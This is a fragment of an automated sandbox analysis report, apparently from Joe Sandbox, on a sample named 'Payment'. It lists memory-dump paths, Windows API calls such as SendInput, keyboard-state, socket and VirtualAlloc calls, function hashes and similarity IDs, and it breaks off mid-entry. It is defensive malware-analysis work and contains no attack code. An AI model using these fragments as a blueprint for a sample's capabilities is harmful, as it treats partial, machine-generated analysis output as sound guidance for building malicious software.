                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: b2e081eae7e05f5aa629197e57b06fe63da2e69c419598ebdf190dbd7c33b53e
                                                          • Instruction ID: 9f5d1e51f4c93ebc09e7247820e033f6ee6b42f7040f11b325ff7678dbf1c51e
                                                          • Opcode Fuzzy Hash: b2e081eae7e05f5aa629197e57b06fe63da2e69c419598ebdf190dbd7c33b53e
                                                          • Instruction Fuzzy Hash: 37D01734510B13CFD720AF31DA0E727B6E5EF05352B11C8BAA896E7660EA70C980DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 2eeaabf3bc39eaf565e9fe83f7e36c61b79cfaa7ea1f14cc3cdffc6cee655ddd
                                                          • Instruction ID: 0d28a360883239a824f1dee1e80f33aba8f6e3b86604f3e80e3cae6b8d5a03e3
                                                          • Opcode Fuzzy Hash: 2eeaabf3bc39eaf565e9fe83f7e36c61b79cfaa7ea1f14cc3cdffc6cee655ddd
                                                          • Instruction Fuzzy Hash: C6D012B1C0811DEACB049A949D849FBB3FCA704311F9009D3F602D2510F7359BC4DB25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7704ac6b1928fd4c1fe257bcbde4cce3c9ab7f839a6102d08c0f205593ac125
                                                          • Instruction ID: b117f389d052232a7f04636585dee9567989a9f2e3c1436a2c6e4372ade3541c
                                                          • Opcode Fuzzy Hash: a7704ac6b1928fd4c1fe257bcbde4cce3c9ab7f839a6102d08c0f205593ac125
                                                          • Instruction Fuzzy Hash: 66C14A75A44226EFCB14CF94D884AAEB7F5FF48710B1185D9E809EB261DB30ED81CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 00B4E3D2
                                                          • CharLowerBuffW.USER32(?,?), ref: 00B4E415
                                                            • Part of subcall function 00B4DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B4DAD9
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B4E615
                                                          • _memmove.LIBCMT ref: 00B4E628
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: 40b4d4ec0e248e65fa0ffb1e7284ed033ac240f2521ba25870ad31ad640b6734
                                                          • Instruction ID: ea8282a3383eec8aaf0ccd7a202996cb7fecc0c5e294c27a214e211aef9b772d
                                                          • Opcode Fuzzy Hash: 40b4d4ec0e248e65fa0ffb1e7284ed033ac240f2521ba25870ad31ad640b6734
                                                          • Instruction Fuzzy Hash: 61C15E716083119FC714DF28C48096ABBE4FF89714F1489AEF9AA9B351D731EA45CF82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00B483D8
                                                          • CoUninitialize.OLE32 ref: 00B483E3
                                                            • Part of subcall function 00B2DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2DAC5
                                                          • VariantInit.OLEAUT32(?), ref: 00B483EE
                                                          • VariantClear.OLEAUT32(?), ref: 00B486BF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: 90da6129ab079bd950235344948639c4b153af4fea388d32960d6864fe901081
                                                          • Instruction ID: 1d6d6c105765f8d5b3296848ab356991c251bda8ce9a13b49824bc8a77f61628
                                                          • Opcode Fuzzy Hash: 90da6129ab079bd950235344948639c4b153af4fea388d32960d6864fe901081
                                                          • Instruction Fuzzy Hash: DAA11675204711AFCB10DF24C591B2EB7E4BF88354F158489F99A9B3A2CB30EE04DB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B62C7C,?), ref: 00B27C32
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B62C7C,?), ref: 00B27C4A
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00B5FB80,000000FF,?,00000000,00000800,00000000,?,00B62C7C,?), ref: 00B27C6F
                                                          • _memcmp.LIBCMT ref: 00B27C90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 288059627e681824d1c0cab024757c3c085c01b5f0ffb08777b6440af9b58eba
                                                          • Instruction ID: 6bf849e48b9590052111e33db63885e1de4391e2bd238b9e6350a62802b07a34
                                                          • Opcode Fuzzy Hash: 288059627e681824d1c0cab024757c3c085c01b5f0ffb08777b6440af9b58eba
                                                          • Instruction Fuzzy Hash: DA810C71A00119EFCB04DFA4D988EEEB7F9FF89315F204199E506AB250DB71AE05CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: f5aef0602ef53fa0d64575e74ad0c55cd0ccc54a2e37cfdcce16a5d5ffa9b6d7
                                                          • Instruction ID: 64a037044b7d4e759f838a988f12b555c7951e9d21a4a3a41758c27e80330f5f
                                                          • Opcode Fuzzy Hash: f5aef0602ef53fa0d64575e74ad0c55cd0ccc54a2e37cfdcce16a5d5ffa9b6d7
                                                          • Instruction Fuzzy Hash: 5F51B2306583129ADB30AF65F895A7BF3E5EF48310F20885FE59ECB291DF7098449B19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetWindowRect.USER32(0148EA00,?), ref: 00B59AD2
                                                          • ScreenToClient.USER32(00000002,00000002), ref: 00B59B05
                                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B59B72
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: a7f86e91c95d17960660c0c967198099cbc89849764ddb5485077b3aea498c9a
                                                          • Instruction ID: 063e85633e954edf0c2217599a3ee62d3cebf9406893573c245b2adf33109c08
                                                          • Opcode Fuzzy Hash: a7f86e91c95d17960660c0c967198099cbc89849764ddb5485077b3aea498c9a
                                                          • Instruction Fuzzy Hash: A5510B34A00209EFDF14DF68D981AAE7BF5FB55361F1481AAFC159B2A0D730AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00B46CE4
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46CF4
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B46D58
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00B46D64
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: c1d387a985299addd2633a7d9b2bde68efaaf7886a9467f71926fb560eefb6ac
                                                          • Instruction ID: ed27b2714baa29c5bc22076cf9d940642a331134e46ca31781e53d34d534dfbf
                                                          • Opcode Fuzzy Hash: c1d387a985299addd2633a7d9b2bde68efaaf7886a9467f71926fb560eefb6ac
                                                          • Instruction Fuzzy Hash: B441B475740210AFEB10AF24DD86F3A77E5EB08B10F448059FA5A9B3D2DB74DD008B91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B5F910), ref: 00B467BA
                                                          • _strlen.LIBCMT ref: 00B467EC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: cb3b35e729c7457240183ee1e51f81812951eadc5427a4254af7ce3b88fca56a
                                                          • Instruction ID: 3d6a21856c4042d3c63ab26186b85a2f08984cb84ac4c3e6d906a54287a856c8
                                                          • Opcode Fuzzy Hash: cb3b35e729c7457240183ee1e51f81812951eadc5427a4254af7ce3b88fca56a
                                                          • Instruction Fuzzy Hash: 8E419031A00104AFCB14EBA4DDD5FBEB7E9EF59310F1481A6F81A9B292DB30AE01D751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B3BB09
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00B3BB2F
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B3BB54
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B3BB80
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 11861d8937d1b8795a08e040284016f233f725c351d0eb86225142999a0453be
                                                          • Instruction ID: 4bde15fcb7eb94168bae7135beb360061e158b04efd74a8f842a63ebd434a858
                                                          • Opcode Fuzzy Hash: 11861d8937d1b8795a08e040284016f233f725c351d0eb86225142999a0453be
                                                          • Instruction Fuzzy Hash: F2411539200A11EFCB10EF15C694A5ABBF1EF89310F199499F94A9B366CB34FD01CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B58B4D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 149b8aa38d8e1c631c6a92b61888f4dda7a0ef3d107bfe93d04371cf028af140
                                                          • Instruction ID: 6ad9f39bae9392ebc1cf4745c6283f2c4884a572a5da976b1d60d93eb94e4aeb
                                                          • Opcode Fuzzy Hash: 149b8aa38d8e1c631c6a92b61888f4dda7a0ef3d107bfe93d04371cf028af140
                                                          • Instruction Fuzzy Hash: 3431D674600204BFEF209B18DC95FA937E9EB09352F1445D2FE51F72A0DE329948CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 00B5AE1A
                                                          • GetWindowRect.USER32(?,?), ref: 00B5AE90
                                                          • PtInRect.USER32(?,?,00B5C304), ref: 00B5AEA0
                                                          • MessageBeep.USER32(00000000), ref: 00B5AF11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 9b95f511a83a1ee1146d99a354ea31ccb0b3c1de571173a49ff8ef10dc0fc84b
                                                          • Instruction ID: 41dbf72c22f854f166e977ae37394349a9fd1af840955417d1ea7a752357f695
                                                          • Opcode Fuzzy Hash: 9b95f511a83a1ee1146d99a354ea31ccb0b3c1de571173a49ff8ef10dc0fc84b
                                                          • Instruction Fuzzy Hash: 2D418E70600219DFDB11DF58D885B69BBF5FB49342F2482EAE819EB251DB30A905CF52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00B31037
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00B31053
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B310B9
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B3110B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 79f98e8493d92caccc543964115bbf7e1bba6280b73a326e2caa138e4988392c
                                                          • Instruction ID: d82a17eaee34bba2e1fbab2bff044b4969b5a24a42ce3f7bb840c683e8f2f52f
                                                          • Opcode Fuzzy Hash: 79f98e8493d92caccc543964115bbf7e1bba6280b73a326e2caa138e4988392c
                                                          • Instruction Fuzzy Hash: 4E313730E40688AEFF388A6D8C05BFABBEDEB48310F2846DAE580561D1C77489D49761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B31176
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B31192
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B311F1
                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B31243
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: d98a263b30f2d1cd41fff19c4a3b151deb171efe8ccc94e086ef6a5d24681567
                                                          • Instruction ID: 6b9a4705558411c5cb5dd3f49746ecd5288283ad9f9d1171b7b5cf14f31b1a1c
                                                          • Opcode Fuzzy Hash: d98a263b30f2d1cd41fff19c4a3b151deb171efe8ccc94e086ef6a5d24681567
                                                          • Instruction Fuzzy Hash: B1312830940B085AEF30DA6D8C147FABBFEEB49310F244BDAF580A21D1C7744D559761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B0644B
                                                          • __isleadbyte_l.LIBCMT ref: 00B06479
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B064A7
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B064DD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 211ee7701cf59ec8161e7473615b49c0ac7e07c22053b8e400de31af88f2acea
                                                          • Instruction ID: a21178f5d0f6597a23cb8479410c70e891cfcf1422443dfd90f35e8587a08142
                                                          • Opcode Fuzzy Hash: 211ee7701cf59ec8161e7473615b49c0ac7e07c22053b8e400de31af88f2acea
                                                          • Instruction Fuzzy Hash: CA31AB3160025AAFDB218F65C885BBE7FE9FF40320F1540A9F865972E1EB31D860DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00B55189
                                                            • Part of subcall function 00B3387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B33897
                                                            • Part of subcall function 00B3387D: GetCurrentThreadId.KERNEL32 ref: 00B3389E
                                                            • Part of subcall function 00B3387D: AttachThreadInput.USER32(00000000,?,00B352A7), ref: 00B338A5
                                                          • GetCaretPos.USER32(?), ref: 00B5519A
                                                          • ClientToScreen.USER32(00000000,?), ref: 00B551D5
                                                          • GetForegroundWindow.USER32 ref: 00B551DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 9c71cc523339770658f01a092e5997049fcc9a2f93709a1744fc43bafd2f1903
                                                          • Instruction ID: 367492ce3f00d8e804dd2cb6822f8768b9131819364e63ea0de7eff595b38f60
                                                          • Opcode Fuzzy Hash: 9c71cc523339770658f01a092e5997049fcc9a2f93709a1744fc43bafd2f1903
